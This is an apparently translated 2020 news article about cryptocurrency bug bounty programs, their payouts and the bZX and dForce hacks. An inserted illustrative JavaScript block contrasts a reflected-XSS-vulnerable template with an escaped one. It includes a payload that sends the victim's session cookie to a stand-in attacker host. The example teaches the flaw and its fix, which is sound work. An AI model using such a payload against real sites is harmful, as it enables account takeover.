
An army of hackers can help improve cryptocurrency security, but is that enough?

June 12, 2020

In the last decade, hacking has gradually become a respectable and potentially rewarding career thanks to the introduction of bug bounties.

While some organizations, such as Mozilla, launched bug bounties as early as 2004, the biggest boost for the industry came when Google and Facebook launched similar programs in 2010 and 2011, respectively. Soon after, in 2011 and 2012, platforms like Bugcrowd and HackerOne commercialized bug bounties, making it easier for other companies to set up their own programs.

Bug bounties are paid to independent researchers who find and report vulnerabilities that could affect the security of a system or its users. One of the most common classes of vulnerability is Cross-Site Scripting (XSS), which injects malicious JavaScript into a user’s browser.


Because of how pervasive JavaScript is on the web today, this attack can often be used to hijack a victim’s account. Google pays up to $7,500 for this category of bug.
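As an added illustration (not part of the original article, and not code from any of the projects it discusses), here is a minimal reflected-XSS example in JavaScript: a page template that pastes an untrusted query parameter straight into HTML, next to a version that HTML-escapes it first. The function names, the attacker host `attacker.example` and the sample payload are all constructed for this example.

```javascript
// Added example: reflected XSS versus HTML-escaped output.
// All names (renderGreetingVulnerable, renderGreetingSafe, escapeHtml,
// containsScriptTag) and the payload below are constructed for this
// illustration; they are not taken from any real project.

// Vulnerable: the untrusted parameter is interpolated straight into HTML.
// A browser rendering this page will execute any <script> the attacker supplied.
function renderGreetingVulnerable(name) {
  return `<html><body><h1>Hello, ${name}!</h1></body></html>`;
}

// Hardened: escape the five characters that let input break out of an HTML
// text context before interpolating it.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderGreetingSafe(name) {
  return `<html><body><h1>Hello, ${escapeHtml(name)}!</h1></body></html>`;
}

// Crude check used by the demo: does the page contain a real <script> element?
// (Proper detection needs an HTML parser; this is enough to show the point.)
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Constructed attacker payload: ship the session cookie to an attacker-controlled
// host (hypothetical). A victim who opens ?name=<this> on the vulnerable page
// has their session stolen, which is how an XSS turns into an account takeover.
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

function demo() {
  const vulnerable = renderGreetingVulnerable(PAYLOAD);
  const safe = renderGreetingSafe(PAYLOAD);
  return {
    vulnerableExecutes: containsScriptTag(vulnerable), // true: script would run
    safeExecutes: containsScriptTag(safe),             // false: rendered as text
    safeHtml: safe,
  };
}

console.log(demo());
```

Escaping like this is only correct for an HTML text context; input placed inside an attribute, a `<script>` block or a URL needs the encoding appropriate to that context, and a Content-Security-Policy limits the damage when an escape is missed.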

Why are bug bounties useful?

Security audits and code reviews are limited both in time and in the number of eyes reviewing the code. While they are useful for catching the low-hanging fruit before software is released to the public, some of the most serious bugs can result from the combination of many subtle design flaws.

As a recent example, an independent researcher found a serious flaw in the ProgPoW algorithm despite multiple previous audits.

Recent hacks in decentralized finance, or DeFi, show the complexity of these systems. In the first bZX hack, the core of the vulnerability was a subtle mistake in how the bZX smart contracts checked collateral, but flash loans and other platforms provided the tools needed to extract money through that mistake.

Google’s bounty program shows in a simple way that it is almost impossible to write secure code from scratch. Its bug bounty program logged an unprecedented record of $6 million in payouts in 2019, nine years after its launch. During that time the company had every tool available to perfect its internal security practices, but the complexity of its systems seems to have made that almost impossible.

Crypto bug bounties

Many crypto companies and projects offer generous rewards for critical bugs. The DeFi projects Maker, Compound and Aave have maximum payouts of $100,000, $150,000 and $250,000 respectively.

Major exchanges like Kraken, Coinbase and Binance also run bug bounty programs. Kraken does not state an explicit maximum, while Coinbase’s and Binance’s go up to $50,000 and $10,000 respectively. Not all major exchanges have started such programs, notably Huobi and Bitstamp.

It is worth noting that the announced maximum payout does not necessarily make a program more attractive, since the amounts actually paid are almost always at the company’s discretion.

Of the 458 reports submitted to Coinbase, the maximum payout was only $20,000, while the average is only $200. This is probably due to the low severity of most of the reported bugs. Still, these statistics are important signals for researchers deciding which platform to focus on. Some of the highest average payouts on HackerOne can be obtained from Monolith, Tron (TRX) and Matic, although the latter has only just started its bug bounty program.

Can bug bounties save projects?

Cryptocurrency infrastructure is an ideal target for hackers because of the cash-like properties of the assets it holds; it is much more difficult to steal digital money from a bank.

Successful attacks such as the Coincheck hack, whose perpetrators have not been caught more than two years after the $500 million theft, attract malicious hackers to this industry more than to others.

According to a security ranking published by Hacken in 2019, 82% of all exchanges do not have a bug bounty program. Of those that do and that rank high on its list, only Binance suffered a major attack in 2019.

Oddly enough, both bZX and dForce had set up bug bounty programs before their incidents, but with notable caveats.

bZX’s program had a maximum payout of only $5,000 and, crucially, required researchers to provide proof of identity before collecting a reward. It also seems to have been published only in a Medium post. After the incident, the project addressed all of the above problems.

dForce’s program also required submitting identity documents, and while its maximum payout was $50,000, it covered only the USDx stablecoin system, not the Lendf.me platform that was hacked.

While companies are required to withhold payments from researchers living in sanctioned regions, very few successful programs require full identity verification before paying out. From a bug hunter’s perspective, handing over an ID can be a double-edged sword: legal retaliation against entirely legitimate hackers is frequent, and that discourages them from submitting reports at all.

With all of this in mind, there appears to be a significant correlation between the absence of a fair bug bounty program and catastrophic attacks.

Speaking to Cointelegraph, Egor Homakov, a respected security researcher, offered a warning to those who want to profit from bounties:

“Bounties shouldn’t be forced on any project, and the interest should come from within. Every project already includes a default bounty program, only the rewards are [at] $0. I don’t think people should pressure programs for larger amounts. This market is completely self-regulating and does not require any further research requirements.”

Judging by the reactions of some hacked companies to their incidents, better bug bounties may be on the way.